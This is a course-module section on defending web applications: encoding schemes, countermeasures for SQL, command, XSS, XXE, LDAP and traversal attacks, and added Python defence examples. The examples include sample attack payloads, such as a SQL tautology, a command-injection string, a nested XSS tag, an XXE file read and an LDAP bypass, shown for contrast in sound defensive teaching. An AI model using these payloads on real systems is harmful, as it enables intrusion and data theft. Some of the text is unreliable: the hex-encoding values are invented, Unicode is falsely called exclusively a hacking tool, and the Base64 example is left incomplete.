[Module flow diagram: Web App Concepts, Web App Threats, Hacking Methodology, Web Application Hacking Tools, Countermeasures (current section), Security Tools, Web App Pen Testing]
This section highlights various ways in which you can defend against web application attacks such as SQL injection attacks, command injection attacks, XSS attacks, etc.
Encoding Schemes

• Web applications employ different encoding schemes for their data to safely handle unusual characters and binary data in the way you intend
• URL encoding is the process of converting a URL into valid ASCII format so that data can be safely transported over HTTP
• URL encoding replaces unusual ASCII characters with "%" followed by the character's two-digit ASCII code expressed in hexadecimal, such as:
    %3d  =
    %0a  Newline
    %20  space
• An HTML encoding scheme is used to represent unusual characters so that they can be safely combined within an HTML document
• It defines several HTML entities to represent particular characters, such as &amp; (&), &lt; (<) and &gt; (>)
The HTTP protocol and the HTML language are the two major components of web applications. Both of these components are text based. Web applications employ encoding schemes to ensure that both of these components handle unusual characters and binary data safely. The encoding schemes include:

URL Encoding

URLs are permitted to contain only the printable characters of the ASCII code within the range 0x20-0x7e inclusive. Several characters within this range have special meaning when they appear in the URL scheme or the HTTP protocol; hence, such characters are restricted.

URL encoding is the process of converting URLs into valid ASCII format so that data can be safely transported over HTTP. URL encoding replaces unusual ASCII characters with "%" followed by the character's two-digit ASCII code expressed in hexadecimal, such as:

    %3d  =
    %0a  New line
    %20  space
HTML Encoding

The HTML encoding scheme is used to represent unusual characters so that they can be safely entered within an HTML document as part of its content. The structure of the document is defined by various characters. If you want to use the same characters as part of the document's content, you may face a problem. This problem can be overcome by using HTML encoding. It defines several HTML entities to represent particular characters, such as:

    &amp;  &
    &lt;   <
    &gt;   >
Encoding Schemes (Cont'd)

Hex Encoding
An HTML encoding scheme uses the hex value of every character to represent a collection of characters for transmitting binary data.
Example:
    Hello   A125C458D8
    Jason   123B684AD9

Base64 Encoding
Base64 schemes are used to encode binary data. A Base64 encoding scheme represents any binary data using only printable ASCII characters. Usually it is used for encoding email attachments for safe transmission over SMTP, and also for encoding user credentials.
Example:
    cake
    01100011 01100001 01101011 01100101
    Base64 encoding: 011000 110110 000101 101011 011001 010000 000000 000000

Unicode Encoding
Unicode is a character encoding standard that is designed to support all of the writing systems used in the world. Unicode is exclusively used to hack web applications. Unicode encoding helps attackers to bypass the filters.
16-bit Unicode encoding: it replaces unusual Unicode characters with "%u" followed by the character's Unicode code point expressed in hexadecimal:
    %u2215  /
    %u00e9  é
UTF-8: it is a variable-length encoding standard that uses each byte expressed in hexadecimal and preceded by the % prefix:
    %c2%a9     ©
    %e2%89%a0  ≠

TABLE 13.2: Encoding Schemes Table
How to Defend Against SQL Injection Attacks
To defend against SQL injection attacks, various things have to be taken care of: unchecked user input should not be allowed to pass into database queries. Every user variable passed to the database should be validated and sanitized. The given input should be checked for the expected data type. User input that is passed to the database should be quoted.

• Limit the length of user input
• Use custom error messages
• Monitor DB traffic using an IDS, WAF
• Disable commands like xp_cmdshell
• Isolate database server and web server
• Always use method attribute set to POST
• Run database service account with minimal rights
• Move extended stored procedures to an isolated server
• Use typesafe variables or functions such as IsNumeric() to ensure typesafety
• Validate and sanitize user inputs passed to the database
• Use low privileged account for DB connection
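As an added example (not code from the course material), the following Python script shows three of the items above working together: a length-limited, rigorous input specification, a typesafe conversion in the spirit of IsNumeric(), and a parameterized query that keeps user values out of the SQL text. It uses Python's built-in sqlite3 module with an in-memory database and constructed sample rows; the table, column and function names are this example's own. The string-concatenation version is included only as the "before" to contrast with the parameterized one.

```python
"""Parameterized queries plus input validation against SQL injection.

Added example, not part of the CEH course material. Uses sqlite3 from the
standard library and constructed sample data.
"""
import re
import sqlite3

MAX_USERNAME_LEN = 32                                  # limit the length of user input
_USERNAME_RE = re.compile(r"[A-Za-z0-9_]{1,%d}" % MAX_USERNAME_LEN)
_INT_RE = re.compile(r"-?[0-9]+")


def build_db() -> sqlite3.Connection:
    """Constructed sample data: two accounts in an in-memory database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, email TEXT)")
    conn.executemany("INSERT INTO users (username, email) VALUES (?, ?)",
                     [("alice", "alice@example.test"), ("bob", "bob@example.test")])
    conn.commit()
    return conn


def find_email_vulnerable(conn: sqlite3.Connection, username: str) -> list:
    """'Before': the user value is spliced into the SQL text, so a quote in
    the input changes the structure of the query instead of being data."""
    query = "SELECT email FROM users WHERE username = '" + username + "'"
    return [row[0] for row in conn.execute(query)]


def find_email_safe(conn: sqlite3.Connection, username: str) -> list:
    """'After': a parameterized query. The driver passes the value separately
    from the SQL text, so it is always treated as data."""
    query = "SELECT email FROM users WHERE username = ?"
    return [row[0] for row in conn.execute(query, (username,))]


def validate_username(username: str) -> bool:
    """Rigorous specification: only word characters, 1..32 of them.
    fullmatch is used so a trailing newline cannot slip past the check."""
    return _USERNAME_RE.fullmatch(username) is not None


def to_int_or_none(value: str):
    """Typesafe handling of a numeric parameter (the IsNumeric() idea):
    accept only an integer literal and convert it explicitly."""
    value = value.strip()
    return int(value) if _INT_RE.fullmatch(value) else None


def lookup(conn: sqlite3.Connection, username: str) -> list:
    """Defence in depth: validate first, then use the parameterized query.
    The error raised carries a custom message, not a database error."""
    if not validate_username(username):
        raise ValueError("invalid username")
    return find_email_safe(conn, username)


if __name__ == "__main__":
    conn = build_db()
    payload = "' OR '1'='1"                   # classic tautology, shown for contrast
    print("vulnerable:", find_email_vulnerable(conn, payload))  # both rows leak
    print("safe:      ", find_email_safe(conn, payload))        # no match
    print("validated: ", lookup(conn, "alice"))
    print("ids:", to_int_or_none("42"), to_int_or_none("42 OR 1=1"))
```

The parameterized query alone already neutralizes the tautology; the validator and the integer conversion add the "limit the length" and "typesafe" controls from the list and give the application a place to return a custom error message instead of exposing one from the database.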
How to Defend Against Command Injection Flaws

The simplest way to protect against command injection flaws is to avoid them wherever possible. Some language-specific libraries perform identical functions for many shell commands and some system calls. These libraries do not invoke the operating system shell interpreter, and so avoid most shell command problems. For those calls that must still be used, such as calls to backend databases, one must carefully validate the data to ensure that it does not contain malicious content. One can also structure requests in a pattern that ensures all given parameters are treated as data instead of potentially executable content. Most system calls, and the use of stored procedures with parameters that accept valid input strings to access a database, or prepared statements, provide significant protection by ensuring that the supplied input is treated as data; this reduces, but does not completely eliminate, the risk involved in these external calls. One can always validate the input to ensure the protection of the application in question. Least privileged accounts must be used to access a database so that there is the smallest possible loophole.

The other strong protection against command injection is to run web applications with only the privileges required to carry out their functions. Therefore, one should avoid running the web server as root, or accessing a database as a DB ADMIN, or else an attacker may be able to misuse administrative rights. The use of the Java sandbox in J2EE environments stops the execution of system commands.
When an external command is used, thoroughly check any user information that is inserted into the command. Create a mechanism for handling all possible errors, timeouts, or blockages during the calls. To ensure the expected work is actually performed, check all the output, return, and error codes from the call. At the least, this allows the user to determine if something has gone wrong. Otherwise, an attack may occur and never be detected.

• Perform input validation
• Use language-specific libraries that avoid problems due to shell commands
• Use a safe API that avoids the use of the interpreter entirely
• Use parameterized SQL queries
• Escape dangerous characters
• Perform input and output encoding
• Structure requests so that all supplied parameters are treated as data, rather than potentially executable content
• Use modular shell disassociation from kernel
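The following is an added example, not code from the course material, that puts the paragraph and list above into one Python wrapper: an allow-list validator for the single user-supplied value, a call made through a safe API that never starts the shell interpreter (so every argument is data), a timeout, and a check of the exit status so that failures are reported rather than lost. It uses Python's subprocess module; the validator, the wrapper and the use of "echo" as the demonstration command are this example's own choices, and a real application would substitute its own binary and arguments.

```python
"""Calling an external command without the shell, with validation, a
timeout and exit-status checking.

Added example, not part of the CEH course material. 'echo' stands in for
whatever program the application really needs to run.
"""
import re
import subprocess

# Rigorous specification for the one value accepted from the user: a DNS host
# name (labels of letters, digits and hyphens joined by dots). By construction
# this excludes shell metacharacters, spaces and newlines.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME_RE = re.compile(r"(?:%s\.)*%s" % (_LABEL, _LABEL))


def validate_hostname(value: str) -> bool:
    """Allow-list validation; fullmatch so nothing can trail the host name."""
    return len(value) <= 253 and _HOSTNAME_RE.fullmatch(value) is not None


def run_command(argv: list, timeout: float = 5.0) -> dict:
    """Run argv directly (shell=False), never via '/bin/sh -c'. Each list element
    reaches the program as one argument, so ';', '|' or '$(...)' inside an
    argument are plain text to the program. Timeouts, a missing binary and a
    non-zero exit status are all reported in the result instead of ignored."""
    try:
        proc = subprocess.run(argv, shell=False, capture_output=True,
                              text=True, timeout=timeout)
    except subprocess.TimeoutExpired:
        return {"ok": False, "error": "timeout", "stdout": "", "stderr": ""}
    except OSError as exc:                      # e.g. the binary does not exist
        return {"ok": False, "error": str(exc), "stdout": "", "stderr": ""}
    ok = proc.returncode == 0
    return {"ok": ok,
            "error": None if ok else "exit status %d" % proc.returncode,
            "stdout": proc.stdout, "stderr": proc.stderr}


def echo_hostname(user_value: str) -> dict:
    """Validate first, then pass the value as a single argv element.
    The pattern this replaces is string building with shell=True, e.g.
    subprocess.run("echo " + user_value, shell=True), where the shell
    would interpret any metacharacters in user_value."""
    if not validate_hostname(user_value):
        return {"ok": False, "error": "rejected by input validation",
                "stdout": "", "stderr": ""}
    return run_command(["echo", user_value])


if __name__ == "__main__":
    print(echo_hostname("example.com"))
    print(echo_hostname("example.com; id"))              # rejected, no call made
    print(run_command(["echo", "a; echo b"])["stdout"])  # the literal text, once
    print(run_command(["/nonexistent/binary"])["error"])
```

The third call in the demonstration is the key observation: even without the validator, an argument containing ";" is echoed back as literal text because no shell ever parsed it. Validation is kept anyway, since the program being invoked may have its own interpretation of unusual arguments.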
C E H
How to Defend Against XSS
Attacks
• Validate all headers, cookies, query strings, form fields, and hidden fields (i.e., all parameters) against a rigorous specification
• Encode input and output and filter meta characters in the input
• Use testing tools extensively during the design phase to eliminate such XSS holes in the application before it goes into use
• Do not always trust websites that use HTTPS when it comes to XSS
• Use a web application firewall to block the execution of malicious script
• Filtering script output can also defeat XSS vulnerabilities by preventing them from being transmitted to users
• Convert all non-alphanumeric characters to HTML character entities before displaying the user input in search engines and forums
• Develop some standard or signing scripts with private and public keys that actually check to ascertain that the script introduced is really authenticated
How to Defend Against XSS Attacks
The following are the defensive techniques to prevent XSS attacks:
• Check and validate all the form fields, hidden fields, headers, cookies, query strings, and all the parameters against a rigorous specification.
• Implement a stringent security policy.
• Web servers, application servers, and web application environments are vulnerable to cross-site scripting. It is hard to identify and remove XSS flaws from web applications. The best way to find flaws is to perform a security review of the code, and search in all the places where input from an HTTP request comes back out as output through HTML.
• A variety of different HTML tags can be used to transmit malicious JavaScript. Nessus, Nikto, and other tools can help to some extent for scanning websites for these flaws. If a vulnerability is discovered in one website, there is a high chance of it being vulnerable to other attacks.
• Filter the script output to defeat XSS vulnerabilities, which can prevent them from being transmitted to users.
• The entire code of the website has to be reviewed if it has to be protected against XSS attacks. The sanity of the code should be checked by reviewing and comparing it against exact specifications. The areas should be checked as follows: the headers, as well as
cookies, query strings, form fields, and hidden fields. The validation process should not attempt to recognize active content and then remove, filter, or sanitize it; that negative approach is unreliable and is no substitute for validation against the specification.
• There are too many ways to encode active content for a filter to recognize them all. A "positive security policy" is highly recommended, which specifies exactly what is allowed and rejects everything else. Negative or attack-signature-based policies are hard to maintain, as they are always incomplete.
• Input fields should be limited to a maximum length, since most script attacks need several characters to get started.
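The contrast between a negative filter and a positive policy plus output encoding is easier to see in code. The following is an added example (not part of the original module): a signature-style filter that strips `<script>` tags, the encoded nesting that slips past it, an allowlist validator for a username field, and entity encoding applied at the point where the value is written into HTML. The username specification and the comment markup are assumptions made for this example.

```python
import html
import re

# Assumed positive specification: a username is 3-32 characters of letters,
# digits, underscore or hyphen, nothing else.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_-]{3,32}$")


def validate_username(value):
    """Allowlist check: decide what is permitted and reject everything else."""
    return bool(USERNAME_RE.match(value))


def naive_script_filter(value):
    """A negative (signature) filter that strips the one tag it knows about.
    Included only to show why this approach is incomplete: removing a
    substring once can *assemble* the very tag it tried to remove."""
    return value.replace("<script>", "").replace("</script>", "")


def encode_for_html(value):
    """Convert characters meaningful to HTML into entities before output.
    quote=True also covers " and ' so the value is safe inside attributes."""
    return html.escape(value, quote=True)


def render_comment(author, text):
    """Output encoding applied where untrusted data meets HTML. Both the
    attribute value and the element body are encoded for the HTML context;
    a value placed inside JavaScript or a URL would need that context's
    encoding instead."""
    return ('<div class="comment" data-author="%s"><b>%s</b>: %s</div>'
            % (encode_for_html(author), encode_for_html(author),
               encode_for_html(text)))
```

Given the payload `<scr<script>ipt>alert(1)</scr</script>ipt>`, the negative filter returns a working `<script>alert(1)</script>`, whereas `render_comment` emits the same payload as `&lt;scr&lt;script&gt;...` text that the browser will display rather than run. The validator rejects `<b>x</b>` outright because it is not in the allowed alphabet, which is the "rigorous specification" the text asks for.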
How to Defend Against DoS Attacks
How to Defend Against DoS Attacks
The following are the various measures that can be adopted to defend against DoS attacks:
• Configure the firewall to deny external Internet Control Message Protocol (ICMP) traffic access (rate-limit rather than drop all ICMP if path MTU discovery must keep working).
• Secure the remote administration and connectivity testing.
• Avoid unsafe functions such as gets and strcpy, and prevent return addresses from being overwritten.
• Prevent sensitive information from being overwritten.
• Perform thorough input validation.
• Data supplied by the attacker should never be executed.
How to Defend Against Web Services Attacks
How to Defend Against Web Services Attacks
To defend against web services attacks, there should be a provision for multiple layers of protection that dynamically enforce legitimate application usage and block all known attack paths, with or without relying on signature databases. This combination can block even previously unknown attacks. Standard HTTP authentication techniques such as digest and SSL/TLS client-side certificates can be used for web services as well. Since most models involve business-to-business applications, it becomes easier to restrict access to only valid users.
• Configure firewalls/IDSs for web services anomaly and signature detection.
• Configure WSDL access control permissions to grant or deny access to any type of WSDL-based SOAP messages.
• Configure firewalls/IDS systems to filter improper SOAP and XML syntax.
• Use document-centric authentication credentials that use SAML.
• Implement centralized in-line request and response schema validation.
• Use multiple security credentials such as X.509 certificates, SAML assertions, and WS-Security.
• Block external references and use pre-fetched content when de-referencing URLs.
• Deploy web-services-capable firewalls capable of SOAP- and ISAPI-level filtering.
• Maintain and update a secure repository of XML schemas.
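"Block external references" is the defense against XML external entity (XXE) injection, which the list states without illustrating. The following is an added example (not code from the original module) using Python's standard `xml.sax` parser: the same constructed SOAP-style request is parsed once with external general entities enabled, so a local file is pulled into the response, and once with them disabled, so the reference resolves to nothing. A pre-parse `DOCTYPE` check and a root-element check stand in for the schema validation the text recommends; the `order`/`item` schema, the secret file and its content are assumptions of this example (in production, the `defusedxml` package is the usual wrapper for this).

```python
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges

ALLOWED_ROOT = "order"  # assumed schema: one <order> holding <item> elements


class ItemCollector(ContentHandler):
    """Collects the text of every <item> and remembers the root element."""

    def __init__(self):
        super().__init__()
        self.root = None
        self.items = []
        self._buf = None

    def startElement(self, name, attrs):
        if self.root is None:
            self.root = name
        if name == "item":
            self._buf = []

    def characters(self, content):
        if self._buf is not None:
            self._buf.append(content)

    def endElement(self, name):
        if name == "item":
            self.items.append("".join(self._buf))
            self._buf = None


def has_doctype(xml_bytes):
    """Cheap pre-parse check: a schema-validated service never needs a
    client-supplied DTD, so reject any body that carries one."""
    return b"<!DOCTYPE" in xml_bytes or b"<!ENTITY" in xml_bytes


def parse_order(xml_bytes, allow_external_entities=False):
    """Parse a request. The safe configuration (the default here) tells the
    parser not to follow external general entities at all."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, allow_external_entities)
    handler = ItemCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    if handler.root != ALLOWED_ROOT:
        raise ValueError("unexpected root element %r" % handler.root)
    return handler.items


def xxe_demo():
    """Constructed demonstration: a request whose DTD declares an entity
    pointing at a local file and references it inside an <item>."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write("db-password-123")  # constructed secret, not a real credential
        secret_path = f.name
    try:
        evil = ('<?xml version="1.0"?>\n'
                '<!DOCTYPE order [<!ENTITY xxe SYSTEM "%s">]>\n'
                '<order><item>widget</item><item>&xxe;</item></order>'
                % secret_path).encode()
        return {
            "doctype_present": has_doctype(evil),
            "leaked": parse_order(evil, allow_external_entities=True),
            "blocked": parse_order(evil, allow_external_entities=False),
        }
    finally:
        os.unlink(secret_path)
```

Running `xxe_demo()` shows the file content appearing as the second item when external entities are followed and an empty string when they are blocked; `has_doctype` rejects the request before it ever reaches the parser, which is the cheaper of the two controls and the one to apply first.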
Web Application Countermeasures
Web Application Countermeasures
The following are the various countermeasures that can be adopted for web applications.
Unvalidated Redirects and Forwards
• Avoid using redirects and forwards.
• If destination parameters cannot be avoided, ensure that the supplied value is valid and authorized for the user.
Cross-Site Request Forgery
• Log off immediately after using a web application and clear the history.
• Do not allow your browser and websites to save login details.
• Check the HTTP Referer header and, when processing a POST, ignore URL parameters.
Broken Authentication and Session Management
• Use SSL/TLS for all authenticated parts of the application.
• Verify that all users' credentials are stored in hashed form (a salted, deliberately slow password hash).
• Never pass session identifiers as GET or POST parameters; carry them only in cookies.
Insecure Cryptographic Storage
• Do not create or use weak cryptographic algorithms.
• Generate encryption keys offline and store them securely.
• Ensure that encrypted data stored on disk is not easy to decrypt.
Web Application Countermeasures (Cont'd)
Web Application Countermeasures (Cont'd)
The following are the various countermeasures that can be adopted for web applications.
Insufficient Transport Layer Protection
• Non-SSL requests to web pages should be redirected to the SSL (HTTPS) page.
• Set the 'secure' flag on all sensitive cookies.
• Configure the SSL/TLS provider to support only strong algorithms.
• Ensure the certificate is valid, not expired, and matches all domains used by the site.
• Backend and other connections should also use SSL/TLS or other encryption technologies.
Directory Traversal
• Define access rights to the protected areas of the website.
• Apply checks and hotfixes that prevent exploitation of known traversal bypasses, such as Unicode-encoded path separators; decode and normalize the path before checking it.
• Web servers should be updated with security patches in a timely manner.
Cookie/Session Poisoning
• Do not store plain text or weakly encrypted passwords in a cookie.
• Implement a cookie timeout.
• A cookie's authentication credentials should be associated with an IP address (strict IP binding can log out legitimate users behind NAT or on mobile networks whose address changes, so weigh that against the benefit).
• Make logout functions available.
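The cross-site request forgery, session management, transport-layer and cookie/session poisoning points above all meet in how a session cookie is issued and how a state-changing POST is checked. The following is an added example (not code from the original module) that sets the `secure` flag (plus `HttpOnly` and `SameSite`), enforces an idle timeout with a logout path, takes the session only from the cookie (never from a GET or POST parameter), checks the Origin/Referer header against the site's host, and reads the anti-forgery token from the POST body only so parameters in the URL are ignored. The per-session token is a standard control that the text does not mention; the hostname `app.example.com`, the 15-minute timeout and the in-memory store are assumptions of this example.

```python
import hmac
import secrets
import time
from http.cookies import SimpleCookie
from urllib.parse import parse_qs, urlsplit

SITE_HOST = "app.example.com"  # assumed deployment hostname
SESSION_TTL = 15 * 60          # assumed idle timeout, in seconds


def session_cookie_header(session_id):
    """Set-Cookie value for the session: Secure so it never travels over plain
    HTTP, HttpOnly so page script cannot read it, SameSite=Strict so browsers
    do not attach it to cross-site requests, Max-Age matching the timeout."""
    c = SimpleCookie()
    c["sid"] = session_id
    c["sid"]["secure"] = True
    c["sid"]["httponly"] = True
    c["sid"]["samesite"] = "Strict"
    c["sid"]["path"] = "/"
    c["sid"]["max-age"] = SESSION_TTL
    return c.output(header="").strip()


class SessionStore:
    """Server-side sessions keyed by a random id; `now` is injectable so the
    timeout can be exercised without waiting."""

    def __init__(self, now=time.time):
        self._now = now
        self._sessions = {}

    def create(self, user):
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"user": user, "last": self._now(),
                               "csrf": secrets.token_urlsafe(32)}
        return sid

    def get(self, sid):
        s = self._sessions.get(sid)
        if s is None:
            return None
        if self._now() - s["last"] > SESSION_TTL:
            del self._sessions[sid]   # idle too long: treat as logged out
            return None
        s["last"] = self._now()
        return s

    def logout(self, sid):
        self._sessions.pop(sid, None)


def post_params(url, body):
    """When processing a POST use only the body. The URL's query string is
    deliberately not consulted, so a crafted link cannot smuggle parameters."""
    return parse_qs(body, keep_blank_values=True)


def csrf_check(store, headers, cookies, body_params):
    """Decide whether a state-changing POST may proceed. Returns (allowed, why)."""
    sid = cookies.get("sid")                 # session comes from the cookie only
    session = store.get(sid) if sid else None
    if session is None:
        return False, "no valid session"
    origin = headers.get("Origin") or headers.get("Referer")
    if not origin or urlsplit(origin).hostname != SITE_HOST:
        return False, "cross-site origin"
    token = body_params.get("csrf_token", [""])[0]
    if not hmac.compare_digest(token.encode(), session["csrf"].encode()):
        return False, "bad or missing token"
    return True, "ok"
```

A request from `https://evil.example` fails on the origin check even with a valid cookie, and a request whose token appears only in the URL fails on the token check because `post_params` never reads the query string. Once the clock passes `SESSION_TTL` without activity, `store.get` returns `None` and the user is effectively logged out.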
Web Application Countermeasures (Cont'd)
Web Application Countermeasures (Cont'd)
The following are the various countermeasures that can be adopted for web applications.
Security Misconfiguration
• Configure all security mechanisms and turn off all unused services.
• Set up roles, permissions, and accounts, and disable all default accounts or change their default passwords.
• Scan for the latest security vulnerabilities and apply the latest security patches.
LDAP Injection Attacks
• Perform type, pattern, and domain value validation on all input data.
• Make LDAP filters as specific as possible.
• Validate and restrict the amount of data returned to the user.
• Implement tight access control on the data in the LDAP directory.
• Perform dynamic testing and source code analysis.
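The LDAP items above can be shown concretely. The following is an added example (not code from the original module): an injectable filter built by string formatting, the RFC 4515 escaping that turns filter metacharacters in a value into `\xx` sequences, a pattern check for the username field, and a search request that limits the attributes and the number of entries returned. The username specification and the `uid`/`person` schema are assumptions of this example.

```python
import re

# Assumed specification for a login name: lowercase letter first, then
# lowercase letters, digits, dot, underscore or hyphen, 3 to 32 characters.
USERNAME_RE = re.compile(r"^[a-z][a-z0-9._-]{2,31}$")


def ldap_escape(value):
    """Escape the characters that have meaning in an LDAP search filter
    (RFC 4515): backslash, asterisk, parentheses and NUL become \\xx."""
    out = []
    for ch in value:
        if ch in "\\*()\x00":
            out.append("\\%02x" % ord(ch))
        else:
            out.append(ch)
    return "".join(out)


def login_filter_unsafe(username):
    """The injectable pattern: the value is pasted into the filter, so a
    closing parenthesis lets the attacker restructure the whole expression."""
    return "(&(objectClass=person)(uid=%s))" % username


def login_filter(username):
    """Validate against the specification first, then escape anyway so the
    value can only ever be matched literally."""
    if not USERNAME_RE.match(username):
        raise ValueError("username fails validation: %r" % username)
    return "(&(objectClass=person)(uid=%s))" % ldap_escape(username)


def directory_search(username):
    """A specific request: narrow filter, only the attributes the page needs,
    and a size limit so a broad match cannot dump the directory."""
    return {
        "filter": login_filter(username),
        "attributes": ["uid", "cn", "mail"],
        "size_limit": 1,
    }
```

The classic authentication-bypass value `*)(uid=*))(|(uid=*` produces, through `login_filter_unsafe`, a filter that matches every person entry; `login_filter` rejects it at validation, and even a value that passes a looser check comes out of `ldap_escape` with every `*`, `(` and `)` neutralized.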
File Injection Attack
• Strongly validate user input.
• Consider implementing a chroot jail.
• PHP: Disable allow_url_fopen and allow_url_include in php.ini.
• PHP: Disable register_globals (removed entirely in PHP 5.4) and set error_reporting to E_ALL so that uninitialized variables are reported (they surface as E_NOTICE; E_STRICT alone does not report them).
• PHP: Ensure that all file and stream functions (stream_*) are carefully vetted.
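The directory traversal and file injection countermeasures share one mechanism: never let a raw request value become a filesystem path. The following is an added example (not code from the original module) with a path check that decodes URL encoding first, resolves the path and requires it to stay under the document root, and an include routine that maps an identifier to a file through an allowlist rather than building the path from the value. The `public` root, the template table and the constructed secret file are assumptions of this example.

```python
import tempfile
from pathlib import Path
from urllib.parse import unquote

# Assumed allowlist for includable templates: identifier -> file name.
TEMPLATES = {"home": "home.html", "about": "about.html"}


def safe_path(base_dir, requested):
    """Resolve `requested` inside `base_dir` and refuse anything that escapes
    it: ../ sequences, absolute paths, encoded separators, NUL bytes."""
    req = unquote(requested)          # normalize encoding before checking
    if "\x00" in req:
        raise PermissionError("NUL byte in path")
    base = Path(base_dir).resolve()
    target = (base / req).resolve()   # an absolute req replaces base here
    if target != base and base not in target.parents:
        raise PermissionError("path escapes document root: %r" % requested)
    return target


def serve_file(base_dir, requested):
    """Read a static file only after the path has passed safe_path."""
    target = safe_path(base_dir, requested)
    if not target.is_file():
        raise FileNotFoundError(requested)
    return target.read_text()


def include_template(base_dir, name):
    """Include by identifier: the raw value never touches the path."""
    try:
        filename = TEMPLATES[name]
    except KeyError:
        raise LookupError("unknown template %r" % name)
    return (Path(base_dir) / filename).read_text()


def traversal_demo():
    """Constructed layout: a secret outside the web root and pages inside it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "secret.txt").write_text("db-password-123")   # constructed
        pub = root / "public"
        pub.mkdir()
        (pub / "index.html").write_text("<h1>hello</h1>")
        (pub / "home.html").write_text("<p>home</p>")

        results = {}
        attempts = {
            "normal": "index.html",
            "dotdot": "../secret.txt",
            "encoded": "%2e%2e/secret.txt",
            "absolute": str(root / "secret.txt"),
        }
        for label, req in attempts.items():
            try:
                results[label] = serve_file(pub, req)
            except PermissionError:
                results[label] = "rejected"
        results["include_ok"] = include_template(pub, "home")
        try:
            results["include_unknown"] = include_template(pub, "../secret.txt")
        except LookupError:
            results["include_unknown"] = "unknown"
        return results
```

`traversal_demo()` serves `index.html`, rejects the plain, URL-encoded and absolute attempts to reach `secret.txt`, includes the `home` template, and refuses the unknown identifier; the allowlist makes the PHP `allow_url_include` style of attack impossible by construction because no value from the request is ever opened as a path or URL.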
How to Defend Against Web Application Attacks
How to Defend Against Web Application Attacks
To defend against web application attacks, you can follow the countermeasures stated previously. To protect the web server, you can use a WAF/firewall/IDS and filter packets. You need to constantly update the software using patches to keep the server up-to-date and to protect it from attackers. Sanitize and filter user input, analyze the source code for SQL injection, and minimize the use of third-party applications to protect the web applications. You can also use stored procedures and parameterized queries to retrieve data, and disable verbose error messages, which can give the attacker useful information; use custom error pages instead. To limit the impact of SQL injection on the database, connect using a non-privileged account and grant least privileges on the database, tables, and columns. Disable commands like xp_cmdshell, which can affect the OS of the system.
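The point about verbose error messages is worth seeing side by side with the fix. The following is an added example (not code from the original module): a handler that returns the exception text to the client, which in the constructed failure names a table the attacker did not know about, and a handler that logs the full traceback under a reference id and sends only a generic page carrying that id. The `admin_credentials` table name, the page markup and the logger name are assumptions of this example.

```python
import logging
import sqlite3
import traceback
import uuid

log = logging.getLogger("webapp")  # assumed application logger

# Generic page; the reference id lets support find the server-side log entry.
CUSTOM_ERROR_PAGE = ("<html><body><h1>Something went wrong</h1>"
                     "<p>Reference: %s</p></body></html>")


def verbose_handler(fn):
    """The anti-pattern: driver and framework error text (SQL fragments,
    table names, file paths) goes straight to the client."""
    try:
        return 200, fn()
    except Exception as exc:
        return 500, "Error: %s" % exc


def safe_handler(fn):
    """Keep the detail server-side, tied to a reference id, and show the
    client a custom page that reveals nothing about the backend."""
    try:
        return 200, fn()
    except Exception:
        ref = uuid.uuid4().hex[:12]
        log.error("request failed ref=%s\n%s", ref, traceback.format_exc())
        return 500, CUSTOM_ERROR_PAGE % ref


def failing_query():
    """Constructed failure: a query against a table that does not exist."""
    conn = sqlite3.connect(":memory:")
    return conn.execute("SELECT secret FROM admin_credentials").fetchall()
```

The verbose response contains `no such table: admin_credentials`, which confirms a table name an attacker could only have guessed; the safe response contains a reference id and nothing else, while the log line keeps the whole traceback for the operator.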
[Figure 13.61 (diagram): an attacker on the Internet reaching a login form, the web application, a custom error page, an LDAP server and the operating system, annotated with the defenses: shut down the unnecessary services and ports; keep patches current; sanitize and filter user input; configure the firewall to deny external ICMP traffic access; perform input validation; use a WAF firewall/IDS and filter packets; analyze the source code for SQL injection; minimize use of 3rd-party apps; connect to the database using a non-privileged account; use stored procedures and parameter queries; grant least privileges to the database, tables, and columns; perform dynamic testing and source code analysis; disable commands like xp_cmdshell; disable verbose error messages and use custom error pages; make the LDAP filter as specific as possible.]
FIGURE 13.61: How to Defend Against Web Application Attacks
Module Flow
Now we will discuss web application security tools. Web application security tools help you to detect the possible vulnerabilities in web applications automatically. Prior to this, we discussed web application countermeasures that prevent attackers from exploiting web applications. In addition to countermeasures, you can also employ security tools to protect your web applications from being hacked. Tools in addition to the countermeasures offer more protection.
• Web App Concepts
• Web App Threats
• Hacking Methodology
• Web Application Hacking Tools
• Countermeasures
• Security Tools
• Web App Pen Testing
This section is dedicated to the security tools that protect web applications against various attacks.
Web Application Security Tool: Acunetix Web Vulnerability Scanner
Acunetix WVS checks web applications for SQL injections, cross-site scripting, etc.
Web Application Security Tool: Acunetix Web Vulnerability Scanner
Source: http://www.acunetix.com
Acunetix Web Vulnerability Scanner automatically checks your web applications for SQL injection, XSS, and other web vulnerabilities. It includes advanced penetration testing tools, such as the HTTP Editor and the HTTP Fuzzer. It port scans a web server and runs security checks against network services. It even tests web forms and password-protected areas. The automatic client script analyzer allows for security testing of Ajax and Web 2.0 applications.
[Screenshot: Acunetix Web Vulnerability Scanner (Free Edition) after scanning http://testaspnet.vulnweb.com with the Default profile. The scan finished after 7322 requests with 77 alerts at Acunetix Threat Level 3 (High), including SQL injection (verified) (21), Cross Site Scripting (verified) (10), Blind SQL injection (8), Cross Frame Scripting (6), application and ASP.NET error messages, ASP.NET Padding Oracle vulnerability, user credentials sent in clear text, a login page open to password guessing, the OPTIONS method enabled, a session cookie without the Secure flag, and web server version disclosure on the error page. The tools pane lists Site Crawler, Target Finder, Subdomain Scanner, Blind SQL Injector, HTTP Editor, HTTP Sniffer, HTTP Fuzzer, Authentication Tester, Compare Results and Web Services Scanner/Editor.]
FIGURE 13.62: Acunetix Web Vulnerability Scanner Tool Screenshot
Web Application Security Tool: Watcher Web Security Tool
Watcher is a plugin for the Fiddler HTTP proxy that passively audits a web application to find security bugs and compliance issues automatically.
